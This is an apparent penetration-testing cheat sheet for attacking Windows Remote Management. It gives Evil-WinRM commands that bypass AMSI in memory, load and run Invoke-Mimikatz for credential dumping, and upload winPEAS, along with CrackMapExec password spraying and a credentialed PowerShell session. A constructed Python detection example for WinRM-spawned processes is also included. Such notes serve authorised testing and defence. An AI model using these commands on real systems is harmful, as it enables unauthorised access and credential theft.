WinRM

ABOUT

Windows Remote Management (WinRM) is Microsoft's built-in remote management protocol, driven from the command line. It uses the Simple Object Access Protocol (SOAP) to establish connections to remote hosts and their applications, and it listens on TCP port 5985 (HTTP) and TCP port 5986 (HTTPS). PowerShell remoting sessions and event log forwarding both depend on WinRM.

Evil-WinRM

evil-winrm -i 13.13.13.13 -u venator17 -p password123 # -i target host, -u username, -p password

Run menu inside the session to list Evil-WinRM's built-in commands and the scripts that have been loaded.

Before loading any script or executable, the Antimalware Scan Interface (AMSI) has to be bypassed. The Bypass-4MSI command does this by patching AMSI in memory.

Load Scripts

evil-winrm -i 13.13.13.13 -u venator17 -p password123 -s /opt/scripts/powershell # -s is the local directory holding the PowerShell scripts
Bypass-4MSI # Bypass AMSI first
Invoke-Mimikatz.ps1 # Load the script into memory
Invoke-Mimikatz # Execute the loaded function

Loading Executables

evil-winrm -i 13.13.13.13 -u venator17 -p password123 -e /opt/executables # -e is the local directory holding the executables
Invoke-Binary /opt/executables/winPEAS.exe

Loading Files

Files can only be uploaded from the directory in which evil-winrm was started.

upload /opt/executables/winPEAS.exe
./winPEAS.exe
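As an added defender-side example that is not part of the original cheat sheet: sessions like the ones above run inside wsmprovhost.exe, the host process for WinRM-based PowerShell remoting, so a binary launched from the session (winPEAS.exe here) shows up as a child of that process. The Python below correlates constructed, simplified Security event records (4624 network logon and 4688 process creation, with field names as in the real events but made-up values) to list what was started inside a WinRM session and from which source address.

```python
# Constructed sample records (not real logs): one key=value line per event,
# using field names from Windows Security events 4624 and 4688.
SAMPLE_EVENTS = """\
EventID=4624 LogonType=3 TargetUserName=venator17 IpAddress=10.0.0.5 TargetLogonId=0x3e7a1
EventID=4688 SubjectLogonId=0x3e7a1 ParentProcessName=C:\\Windows\\System32\\wsmprovhost.exe NewProcessName=C:\\Windows\\System32\\conhost.exe
EventID=4688 SubjectLogonId=0x3e7a1 ParentProcessName=C:\\Windows\\System32\\wsmprovhost.exe NewProcessName=C:\\Users\\venator17\\Documents\\winPEAS.exe
EventID=4624 LogonType=2 TargetUserName=sreed IpAddress=- TargetLogonId=0x4f000
EventID=4688 SubjectLogonId=0x4f000 ParentProcessName=C:\\Windows\\explorer.exe NewProcessName=C:\\Windows\\System32\\notepad.exe
"""


def parse_events(text):
    """Turn the simplified key=value lines into a list of dicts."""
    events = []
    for line in text.splitlines():
        if line.strip():
            events.append(dict(tok.split("=", 1) for tok in line.split()))
    return events


def winrm_spawned_processes(events, allowed=("conhost.exe",)):
    """Return (user, source_ip, child_exe) for every process created with
    wsmprovhost.exe as parent, i.e. launched from a WinRM/PowerShell-remoting
    session, skipping children on the allow-list. The network logon (4624,
    LogonType 3) is joined to the process creation (4688) via the logon id,
    which is how the originating user and source address are recovered."""
    logons = {}
    for ev in events:
        if ev["EventID"] == "4624" and ev.get("LogonType") == "3":
            logons[ev["TargetLogonId"]] = (ev["TargetUserName"], ev["IpAddress"])
    hits = []
    for ev in events:
        if ev["EventID"] != "4688":
            continue
        parent = ev["ParentProcessName"].rsplit("\\", 1)[-1].lower()
        child = ev["NewProcessName"].rsplit("\\", 1)[-1].lower()
        if parent != "wsmprovhost.exe" or child in allowed:
            continue
        user, ip = logons.get(ev["SubjectLogonId"], ("?", "?"))
        hits.append((user, ip, child))
    return hits


if __name__ == "__main__":
    for user, ip, exe in winrm_spawned_processes(parse_events(SAMPLE_EVENTS)):
        print(f"WinRM session of {user} from {ip} started {exe}")
```

On a real host the same join works on events exported from the Security log, provided process creation auditing (4688) with command-line logging is enabled.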

Nmap WinRM

nmap -sV -sC 13.13.13.13 -p5985,5986 --disable-arp-ping -n

CrackMapExec

crackmapexec winrm 13.13.13.13 -u user.list -p password

PowerShell

PS C:\> $password = ConvertTo-SecureString "password123" -AsPlainText -Force
PS C:\> $cred = New-Object System.Management.Automation.PSCredential ("MILITECH\sreed", $password)
PS C:\> Enter-PSSession -ComputerName MILITECH-MS13 -Credential $cred
